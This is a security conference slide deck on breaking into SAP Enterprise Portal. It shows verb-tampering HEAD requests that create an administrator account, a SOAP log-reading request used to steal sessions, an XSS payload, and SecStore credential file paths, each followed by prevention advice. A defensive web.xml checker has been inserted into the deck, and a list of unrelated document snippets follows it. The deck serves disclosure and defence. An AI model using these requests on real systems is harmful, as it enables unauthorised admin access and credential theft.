Invest in security to secure investments. Breaking SAP Portal. Alexander Polyakov CTO ERPScan Dmitry Chastuchin - Principal Researcher ERPScan
2 About ERPScan. The only 360-degree SAP Security solution: ERPScan Security Monitoring Suite for SAP. Leader by the number of acknowledgements from SAP (150+). 60+ presentations at key security conferences worldwide. 25 awards and nominations. Research team: 20 experts with experience in different areas of security. Headquarters in Palo Alto (US) and Amsterdam (EU).
3 Agenda. Say hello to SAP Portal. Breaking Portal through SAP Services. Breaking Portal through J2EE Engine. Breaking Portal through Portal issues. Conclusion.
4 SAP. The most popular business application. More than … customers worldwide. 74% of Forbes 500 run SAP.
5 Meet sapscan.com: http://erpscan.com/wp-content/uploads/2012/06/sap-Security-in-figures-a-global-survey final.pdf
6 Say hello to Portal. Point of web access to SAP systems. Point of web access to other corporate systems. Way for attackers to get access to SAP from the Internet. ~17 Portals in Switzerland, according to Shodan. ~11 Portals in Switzerland, according to Google.
7 EP architecture
8 Okay, okay. SAP Portal is important, and it has many links to other modules. So what?
9 SAP Management Console
10 SAP Management Console. SAP MC provides a common framework for centralized system management, allowing you to see the trace and log messages. Using a JSESSIONID from the logs, an attacker can log into Portal. What can we find in the logs? Right! The file userinterface.log contains the calculated JSESSIONID. But the attacker must have credentials for reading the log file! Wrong!
11 SAP Management Console
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http:// instance" xmlns:xs="http://">
  <SOAP-ENV:Header>
    <sapsess:session xmlns:sapsess="http://">
      <enablesession>true</enablesession>
    </sapsess:session>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body>
    <ns1:readlogfile xmlns:ns1="urn:sapcontrol">
      <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
      <filter/>
      <language/>
      <maxentries>%count%</maxentries>
      <statecookie>eof</statecookie>
    </ns1:readlogfile>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
12 Prevention. Don't use TRACE_LEVEL = 3 in production systems, or delete traces. Install notes … and http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe a114084/frameset.htm
13 Single Sign-On
14 SSO (old but still works). SAP implements SSO using the Header Variable Login Module. [Diagram: credentials, cookie, check okay, header_auth, attacker, cookie.] tnx Mariano ;)
15 Prevention. Implement proper network filters to avoid direct connections to the SAP J2EE Engine. If you use it for Windows authentication, switch to SPNegoLoginModule. http://help.sap.com/saphelp_nw73ehp1/helpdata/en/d0/a3d940c e a1550b0/frameset.htm
16 SAP NetWeaver J2EE
17 Access control. Declarative: by WEB.XML. Programmatic: by UME. Web Dynpro: programmatic. Portal iViews: programmatic. J2EE Web apps: declarative.
18 Declarative access control. The central entity in the J2EE authorization model is the security role. Programmers define the application-specific roles in the J2EE deployment descriptors web.xml and web-j2ee-engine.xml.
19 Verb Tampering
20 web.xml
<servlet>
  <servlet-name>criticalaction</servlet-name>
  <servlet-class>com.sap.admin.critical.action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>criticalaction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>
21 Verb Tampering. If we try to get access to an application using GET, we need a login:pass and the administrator role. What if we try to get access to the application using HEAD instead of GET? PROFIT! Did you know about ctc?
22 Verb Tampering. Need an Admin account in SAP Portal? Just send two HEAD requests.
Create a new user blabla:blabla:
HEAD /ctc/configservlet?param=com.sap.ctc.util.userconfig;createuser;username=blabla,password=blabla
Add user blabla to group Administrators:
HEAD /ctc/configservlet?param=com.sap.ctc.util.userconfig;add_user_to_group;username=blabla,groupname=administrators
Works when UME uses the Java database.
23 Prevention. Install SAP notes …, install other SAP notes about Verb Tampering. Scan applications with the ERPScan WEB.XML checker. Disable the applications that are not necessary.
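A defender-side check for the exposure described on slides 20 to 23, added here as an example (it is not from the slides and not ERPScan's own checker): parse a deployment descriptor and flag every security-constraint whose web-resource-collection enumerates http-method elements, since any verb not listed (HEAD in the case above) reaches the servlet without the role check. The sample web.xml is constructed from the descriptor on slide 20, the http://java.sun.com/xml/ns/j2ee namespace is assumed, and the hardened form simply drops the verb list.

```python
"""Audit a J2EE web.xml for HTTP verb tampering exposure (added example).

A <security-constraint> that enumerates <http-method> protects only the verbs
it names; any other verb bypasses the role check.  Omitting <http-method>
makes the constraint apply to every verb.
"""
import xml.etree.ElementTree as ET

# Constructed sample modelled on the descriptor shown on the slides: GET-only.
VULNERABLE_WEB_XML = """<?xml version="1.0"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <servlet>
    <servlet-name>criticalaction</servlet-name>
    <servlet-class>com.sap.admin.critical.action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>criticalaction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""

# Hardened form: the same constraint with the verb list removed.
HARDENED_WEB_XML = VULNERABLE_WEB_XML.replace(
    "      <http-method>GET</http-method>\n", "")

# Verbs a container dispatches by default; used to spell out what a partial
# verb list leaves unchecked (any non-standard verb is unchecked as well).
COMMON_VERBS = ("GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE")


def _local(tag):
    """'{http://java.sun.com/xml/ns/j2ee}servlet' -> 'servlet'."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    """Direct children of elem with local name `name`, ignoring namespaces."""
    return [c for c in elem if _local(c.tag) == name]


def _texts(elem, name):
    """Stripped text of each direct child named `name`, skipping empty ones."""
    return [c.text.strip() for c in _children(elem, name) if c.text and c.text.strip()]


def audit_web_xml(xml_text):
    """One finding per web-resource-collection that enumerates http-method.

    A finding records the URL patterns, the verbs that are checked, the roles
    the check enforces, and the common verbs that bypass it.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for constraint in root.iter():
        if _local(constraint.tag) != "security-constraint":
            continue
        roles = [role
                 for auth in _children(constraint, "auth-constraint")
                 for role in _texts(auth, "role-name")]
        for collection in _children(constraint, "web-resource-collection"):
            methods = [m.upper() for m in _texts(collection, "http-method")]
            if not methods:
                continue  # no verb list: every verb is covered, nothing to flag
            findings.append({
                "resource": " ".join(_texts(collection, "web-resource-name")),
                "url_patterns": _texts(collection, "url-pattern"),
                "protected_methods": methods,
                "unprotected_methods": [v for v in COMMON_VERBS if v not in methods],
                "roles": roles,
            })
    return findings


def report(xml_text):
    """Print a summary of the findings and return how many there were."""
    findings = audit_web_xml(xml_text)
    for f in findings:
        print(f"[verb tampering] {f['resource']} {f['url_patterns']}: role check "
              f"{f['roles']} applies only to {f['protected_methods']}; "
              f"unchecked: {f['unprotected_methods']} and any non-standard verb")
    if not findings:
        print("no verb-restricted security constraints found")
    return len(findings)


if __name__ == "__main__":
    report(VULNERABLE_WEB_XML)  # 1 finding: HEAD etc. reach /admin/* unchecked
    report(HARDENED_WEB_XML)    # 0 findings
```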
24 Invoker servlet
25 web.xml
<servlet>
  <servlet-name>criticalaction</servlet-name>
  <servlet-class>com.sap.admin.critical.action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>criticalaction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>HEAD</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>
GET /admin/critical/criticalaction
GET /servlet/com.sap.admin.critical.action
26 Invoker Servlet. Want to execute an OS command on the J2EE server remotely? Maybe upload a backdoor in a Java class? Or sniff all traffic? Still remember ctc?
27 Invoker Servlet
28 Prevention. Update to the latest patch. EnableInvokerServletGlobally must be false. Check all WEB.XML files with the ERPScan WEBXML checker.
29 So, where is Portal?
30 SAP Portal. User access rights to objects are in the Portal Content Directory (PCD), based on ACLs. 2 types of access: design time (for administrators) and runtime (for users).
31 Portal Permission Levels
32 End User permission. The objects where end user permission is enabled affect the following areas in Portal: all Portal Catalog objects with end user permission. Authorized Portal users may access restricted Portal components by URL if they are granted permission in the appropriate security zone.
33 Administrator permission. Owner = full control + modify permissions. Full control = read/write + delete objects. Read/Write = read + write + edit properties + add/remove children. Write (folders only) = create objects. Read = view objects + create instances (delta links and copies). None = access not granted.
34 Role Assigner permission. The Role Assigner permission setting is available for role objects. It allows you to determine which Portal users are permitted to assign other users, groups, or roles to the role principal using the Role Assignment tool.
35 Security Zones. Security zones allow the system administrator to control which Portal components and Portal services a Portal user can launch. A security zone specifies the vendor ID, the security area, and the safety level for each Portal component and Portal service. Why? To group multiple iViews easily, like files in directories.
36 Security Zones. The security zone is defined in a Portal application descriptor XML file, portalapps.xml. A Portal component or service can only belong to one security zone. Zones allow the administrator to assign permissions to a safety level instead of assigning them directly. Why? To group multiple iViews easily, like files in directories.
37 We can get access to Portal iViews using a direct URL: /irj/servlet/prt/portal/prtroot/<iview_id>. Only Security Zone rights will be checked.
38 Security Zones. So, SecZones offer an extra, but optional, layer of code-level security for iViews. User -> check end user permission to the role -> view iView. User -> check end user permission to the role -> check end user permission to the SecZone -> view iView. By default, this functionality is disabled.
39 So I wonder how many Portal applications with No\Low Safety exist?
40 Safety Levels for Security Zone. No Safety: anonymous users are permitted to access portal components defined in the security zone. Low Safety: a user must be at least an authenticated portal user to access portal components defined in the security zone. Medium Safety: a user must be assigned to a particular portal role that is authorized to access portal components defined in the security zone. High Safety: a user must be assigned to a portal role with higher administrative rights that is authorized to access portal components defined in the security zone.
41 Zones with no safety. Many custom applications with a low security level zone.
42 Prevention. Check security zone permissions: http://help.sap.com/saphelp_nw70/helpdata/en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm http://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b c9f7/frameset.htm
43 SAP Portal web-based services. All of the OWASP Top 10 is relevant: XSS, phishing, traversal, XXE.
44 EPCF
45 XSS. Many XSSs in Portal, but sometimes cookies are HttpOnly. But when we exploit XSS, we can use the features of SAP Portal.
46 EPCF. EPCF provides a JavaScript API designed for client-side communication between portal components and the portal core framework: the Enterprise Portal Client Manager (EPCM). iViews can access the EPCM object from every portal page or IFrame. Every iView contains the EPCM object. For example, EPCF is used as a transient user data buffer for iViews:
<SCRIPT> alert(EPCM.loadClientData("urn:com.sap.myobjects", "person")); </SCRIPT>
47 Prevention. Install SAP note
48 KM Phishing. SAP Knowledge Management may be used to create phishing pages.
49 FIX
50 Directory traversal
51 Directory traversal fix bypass
52 Prevention. Install SAP note
53 Cut the Crap, Show Me the Hack
54 Breaking SAP Portal. Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB. Found a file in the OS of SAP Portal with the keys to decrypt the passwords. Found a vulnerability (another one ;)) which allows reading the files with passwords and keys. Decrypt passwords and log into Portal. PROFIT!
55 Read file. How can we read the file? Directory Traversal. OS command execution. XML External Entity (XXE).
56 XXE in Portal
57 XXE in Portal
58 XXE. Error-based XXE
59 Breaking SAP Portal. OK, we can read files. Where are the passwords? The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: \usr\sap\<sid>\sys\global\security\data\secstore.properties
60 Where are the passwords? (config.properties)
rdbms.maximum_connections=5
system.name=ttt
secstorefs.keyfile=/oracle/ttt/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/ttt/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/tttsapmnt/global/security/lib
rdbms.driverlocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/ttt
rdbms.initial_connections=1
62 But where is the key?
63 SecStore.properties
$internal/version=ni4zff4wmseaseforccmxegafx
admin/host/ttt=7kjuopps/+u +14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/ttt=7kjuopps/+uv+14j56vdc7m7v7dytbgbkgqdp +QD04b0Fh
jdbc/pool/ttt=7kjuopps/+u5jm6s1cvvgq1gzfvarxuuzejthtji0vgegh
admin/port/ttt=7kjuopps/+u+1j4vd1cv6ztvd336rzed7267rwr4zugrtq
$internal/check=bjrrz eua+bw4xczdz16zx78u t
$internal/mode=encrypted
admin/user/ttt=7kjuopps/+u +14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
64 config.properties (same content as slide 60)
65 Get the password. We have an encrypted password. We have a key to decrypt it. We got the J2EE admin and JDBC login:password!
66 Prevention. Install SAP note. Restrict read access to the files SecStore.properties and SecStore.key.
67 Portal post-exploitation. Lots of links to other systems in the corporate LAN. Using SSRF, attackers can get access to these systems. What is SSRF?
68 SSRF History: Basics. We send Packet A to Service A. Service A initiates Packet B to Service B. Services can be on the same or different hosts. We can manipulate some fields of Packet B within Packet A. Various SSRF attacks depend on how many fields of Packet B we can control. [Diagram: Packet A, Packet B]
69 Partial Remote SSRF: HTTP attacks on other services. [Diagram: Direct attack, GET /vuln.jsp; Corporate network, HTTP Server; SSRF Attack, GET /vuln.jsp; A, B]
70 Gopher URI scheme. Using the gopher:// URI scheme, it is possible to send TCP packets: exploit OS vulnerabilities, exploit old SAP application vulnerabilities, bypass SAP security restrictions, exploit vulnerabilities in local services. More info in our BH2012 presentation, SSRF vs. Business Critical Applications: http://erpscan.com/wp-content/uploads/2012/08/ssrf-vs-Businness-critical-applications-whitepaper.pdf
71 Portal post-exploitation
72 Conclusion. It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure. SAP Guides. Regular security assessments. Monitoring. Technical security. ABAP code review. Segregation of Duties. It's all in your hands.
73 Future work. Many of the researched issues cannot be disclosed now because of our good relationship with the SAP Product Security Response Team, whom I would like to thank for cooperation. However, if you want to be the first to see new attacks and demos, follow us and attend future presentations: December 6, BlackHat (UAE, Abu Dhabi); December 13, Syscan 360 (Beijing, China).
74 Web: e-mail: @_chipik
More informationPortal for ArcGIS. Matthias Schenker, Esri Switzerland
Portal for ArcGIS Matthias Schenker, Esri Switzerland Empower people to use and create maps More apps Operations Dashboard for ArcGIS Collector for ArcGIS Maps everywhere Organize your maps and apps enable
More informationInvest in security to secure investments SSRF vs. Business- cri0cal applica0ons: XXE tunneling in SAP
Invest in security to secure investments SSRF vs. Business- cri0cal applica0ons: XXE tunneling in SAP Alexander Polyakov CTO at ERPScan Dmitry Chastukhin Principal Researcher at ERPScan Please download
More informationProvide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any
OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing
More informationAspera Connect Windows XP, 2003, Vista, 2008, 7. Document Version: 1
Aspera Connect 2.6.3 Windows XP, 2003, Vista, 2008, 7 Document Version: 1 2 Contents Contents Introduction... 3 Setting Up... 4 Upgrading from a Previous Version...4 Installation... 4 Set Up Network Environment...
More informationTexSaw Penetration Te st in g
TexSaw Penetration Te st in g What is penetration testing? The process of breaking something or using something for an unintended used case for the purpose of bettering the system or application. This
More informationSetting Up Resources in VMware Identity Manager (SaaS) Modified 15 SEP 2017 VMware Identity Manager
Setting Up Resources in VMware Identity Manager (SaaS) Modified 15 SEP 2017 VMware Identity Manager Setting Up Resources in VMware Identity Manager (SaaS) You can find the most up-to-date technical documentation
More informationSAP Security In-Depth
SAP Security In-Depth by Mariano Nunez Vol. 5 / May 2012 Abstract "SAP platforms are only accessible internally". While that was true in many organizations more than a decade ago, today, driven by modern
More informationInstall and Use the PCD Inspector Tool
How to Install and Use the PCD Inspector Tool ENTERPRISE PORTAL 6.0 SP2 VERSION 1.0 ASAP How to Paper Applicable Releases: EP 6.0 SP2 March 2004. TABLE OF CONTENTS 0 DISCLAIMER...2 1 INTRODUCTION:...2
More informationAdministering Jive Mobile Apps
Administering Jive Mobile Apps Contents 2 Contents Administering Jive Mobile Apps...3 Configuring Jive for Android and ios... 3 Custom App Wrapping for ios... 4 Native App Caching: Android...4 Native App
More informationIntroduction... 5 Configuring Single Sign-On... 7 Prerequisites for Configuring Single Sign-On... 7 Installing Oracle HTTP Server...
Oracle Access Manager Configuration Guide for On-Premises Version 17 October 2017 Contents Introduction... 5 Configuring Single Sign-On... 7 Prerequisites for Configuring Single Sign-On... 7 Installing
More informationArcGIS for Server: Security
DevSummit DC February 11, 2015 Washington, DC Michael Sarhan Esri msarhan@esri.com Agenda Review Basic Security Workflow - ArcGIS Server Roles and Identity Stores - Authentication - Authorization: Securing
More informationYour Turn to Hack the OWASP Top 10!
OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application
More informationSUN Enterprise Development with iplanet Application Server
SUN 310-540 Enterprise Development with iplanet Application Server 6.0 http://killexams.com/exam-detail/310-540 QUESTION: 96 You just created a new J2EE application (EAR) file using iasdt. How do you begin
More informationIntegrating VMware Workspace ONE with Okta. VMware Workspace ONE
Integrating VMware Workspace ONE with Okta VMware Workspace ONE You can find the most up-to-date technical documentation on the VMware website at: https://docs.vmware.com/ If you have comments about this
More informationSetting Up Resources in VMware Identity Manager (On Premises) Modified on 30 AUG 2017 VMware AirWatch 9.1.1
Setting Up Resources in VMware Identity Manager (On Premises) Modified on 30 AUG 2017 VMware AirWatch 9.1.1 Setting Up Resources in VMware Identity Manager (On Premises) You can find the most up-to-date
More informationBest Practices Using KMC Capabilities in an External Facing Portal Version 1.00 October 2006
Best Practices SAP NetWeaver 2004/2004s Best Practices Using KMC Capabilities in an External Facing Portal Version 1.00 October 2006 Applicable Releases: SAP NetWeaver 2004 and 2004s (Usage Type Enterprise
More informationCisco TEO Adapter Guide for SAP Java
Release 2.3 April 2012 Americas Headquarters Cisco Systems, Inc. 170 West Tasman Drive San Jose, CA 95134-1706 USA http://www.cisco.com Tel: 408 526-4000 800 553-NETS (6387) Fax: 408 527-0883 Text Part
More informationEasyCrypt passes an independent security audit
July 24, 2017 EasyCrypt passes an independent security audit EasyCrypt, a Swiss-based email encryption and privacy service, announced that it has passed an independent security audit. The audit was sponsored
More informationSetup an NWDI Track for Composition Environment Developments
How-to Guide SAP NetWeaver 7.0 How To Setup an NWDI Track for Composition Environment Developments Version 2.00 January 2008 Applicable Releases: SAP NetWeaver 7.0 SP13 (Custom Development & Unified Life-Cycle
More informationIntegration Service. Admin Console User Guide. On-Premises
Kony Fabric Integration Service Admin Console User Guide On-Premises Release V8 SP1 Document Relevance and Accuracy This document is considered relevant to the Release stated on this title page and the
More informationPerceptive Enterprise Deployment Suite
Perceptive Enterprise Deployment Suite Installation Guide PEDS Version: 1.2 Environment: Windows Written by: Product Documentation, R&D Date: July 2012 2012 Perceptive Software. All rights reserved CaptureNow,
More information1.264 Lecture 14. SOAP, WSDL, UDDI Web services
1.264 Lecture 14 SOAP, WSDL, UDDI Web services Front Page Demo File->New Web (must create on CEE server) Choose Web type Add navigation using Format->Shared Borders (frames) Use top and left, include navigation
More informationExploi'ng Unpatched ios Vulnerabili'es for Fun and Profit
Exploi'ng Unpatched ios Vulnerabili'es for Fun and Profit Yeongjin Jang, Tielei Wang, Byoungyoung Lee, and Billy Lau Georgia Tech Informa;on Security Center (GTISC) 1 Scope of this Presenta;on The process
More informationHow-To Guide SAP NetWeaver Document Version: How To... Configure CM Services in SAP NetWeaver 7.3 and up
How-To Guide SAP NetWeaver Document Version: 1.0-2014-07-03 How To... Configure CM Services in SAP NetWeaver 7.3 and up Document History Document Version Description 1.0 First official release of this
More informationManaging Remote Medical Devices Through The Cloud. Joel K Young SVP of Research and Development & CTO Digi International Friday, September 9 11:30AM
Managing Remote Medical Devices Through The Cloud Joel K Young SVP of Research and Development & CTO Digi International Friday, September 9 11:30AM Overview The Connectivity and Access Problem What information
More informationChat with a hacker. Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev
Chat with a hacker Increase attack surface for Pentest A talk by Egor Karbutov and Alexey Pertsev $ Whoarewe Egor Karbutov & Alexey Pertsev Penetration testers @Digital Security Speakers Bug Hunters 2
More informationPattern Recognition and Applications Lab WEB Security. Giorgio Giacinto.
Pattern Recognition and Applications Lab WEB Security Giorgio Giacinto giacinto@diee.unica.it Sicurezza Informa1ca, 2015-2016 Department of Electrical and Electronic Engineering University of Cagliari,
More informationSecuring ArcGIS Server Services An Introduction
2013 Esri International User Conference July 8 12, 2013 San Diego, California Technical Workshop Securing ArcGIS Server Services An Introduction David Cordes & Derek Law Esri - Redlands, CA Agenda Security
More informationTIBCO Cloud Integration Security Overview
TIBCO Cloud Integration Security Overview TIBCO Cloud Integration is secure, best-in-class Integration Platform as a Service (ipaas) software offered in a multi-tenant SaaS environment with centralized
More informationMIS Week 7. Operating System Security. Windows Firewalls
MIS 5170 Operating System Security Week 7 Windows Firewalls Tonight s Plan 2 Questions from Last Week Firewalls Review Quiz Questions Review for 1 st test Assignment 3 Overview Spring Break Test 1 Questions
More information